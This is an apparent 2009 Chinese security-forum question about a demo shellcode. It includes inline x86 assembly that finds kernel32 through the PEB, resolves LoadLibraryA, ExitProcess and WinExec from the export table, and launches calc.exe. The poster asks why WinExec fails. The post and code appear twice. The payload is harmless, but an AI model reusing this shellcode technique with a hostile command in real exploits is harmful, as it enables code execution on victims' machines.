-
-
[讨论]SHELLCODE之WinExec的调用问题
-
发表于: 2009-7-16 10:19
-
最近找了个漏洞,BOSS让我写个SHELLCODE演示,我想那就弹出个计算器得了。
没想到,写好后返回错误竟然是ERROR_FILE_NOT_FOUND,我这个汗啊!
下面是我的SHELLCODE,谁遇到过种情况,给偶说说
#include<windows.h>
int WINAPI WinMain(HINSTANCE,HINSTANCE,LPSTR,int)
{
_asm
{
mov eax,fs:[0x30]
mov eax,[eax+0xc]
mov esi,[eax+0x1c]
lodsd
mov eax,[eax+0x8]
mov ebp,eax
mov eax,[ebp+0x3c]
mov edx,[ebp+eax+0x78]
add edx,ebp
mov ecx,[edx+0x18]
mov ebx,[edx+0x20]
add ebx,ebp
search:
dec ecx
mov esi,[ebx+ecx*4]
add esi,ebp
mov eax,0x50746547
cmp [esi],eax
jne search
mov eax,0x41636f72
cmp [esi+4],eax
jne search
mov eax,0x41636f72
cmp [esi+4],eax
jne search
mov ebx,[edx+0x24]
add ebx,ebp
mov cx,[ebx+ecx*2]
mov ebx,[edx+0x1c]
add ebx,ebp
mov eax,[ebx+ecx*4]
add eax,ebp
mov edi,ebp
push ebp
sub esp,50
mov ebp,esp
mov [ebp+0x40],eax
push 0
push 0x41797261
push 0x7262694C
push 0x64616F4C
push esp
push edi
call [ebp+0x40] //LoadLibraryA
mov [ebp+0x44],eax
push 0x737365
push 0x636F7250
push 0x74697845
push esp
push edi
call [ebp+0x40] //ExitProcess
mov [ebp+0x4],eax
push 0x636578
push 0x456E6957
push esp
push edi
call [ebp+0x40] //WinExec
mov edi,eax
mov dword ptr[ebp+0x10],0x636C6163
mov dword ptr[ebp+0x14],0x6578652E
mov dword ptr[ebp+0x18],0
push 5
lea eax,[ebp+0x10]
push eax
call edi
}
return 1;
}
没想到,写好后返回错误竟然是ERROR_FILE_NOT_FOUND,我这个汗啊!
下面是我的SHELLCODE,谁遇到过种情况,给偶说说
#include<windows.h>
int WINAPI WinMain(HINSTANCE,HINSTANCE,LPSTR,int)
{
_asm
{
mov eax,fs:[0x30]
mov eax,[eax+0xc]
mov esi,[eax+0x1c]
lodsd
mov eax,[eax+0x8]
mov ebp,eax
mov eax,[ebp+0x3c]
mov edx,[ebp+eax+0x78]
add edx,ebp
mov ecx,[edx+0x18]
mov ebx,[edx+0x20]
add ebx,ebp
search:
dec ecx
mov esi,[ebx+ecx*4]
add esi,ebp
mov eax,0x50746547
cmp [esi],eax
jne search
mov eax,0x41636f72
cmp [esi+4],eax
jne search
mov eax,0x41636f72
cmp [esi+4],eax
jne search
mov ebx,[edx+0x24]
add ebx,ebp
mov cx,[ebx+ecx*2]
mov ebx,[edx+0x1c]
add ebx,ebp
mov eax,[ebx+ecx*4]
add eax,ebp
mov edi,ebp
push ebp
sub esp,50
mov ebp,esp
mov [ebp+0x40],eax
push 0
push 0x41797261
push 0x7262694C
push 0x64616F4C
push esp
push edi
call [ebp+0x40] //LoadLibraryA
mov [ebp+0x44],eax
push 0x737365
push 0x636F7250
push 0x74697845
push esp
push edi
call [ebp+0x40] //ExitProcess
mov [ebp+0x4],eax
push 0x636578
push 0x456E6957
push esp
push edi
call [ebp+0x40] //WinExec
mov edi,eax
mov dword ptr[ebp+0x10],0x636C6163
mov dword ptr[ebp+0x14],0x6578652E
mov dword ptr[ebp+0x18],0
push 5
lea eax,[ebp+0x10]
push eax
call edi
}
return 1;
}
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
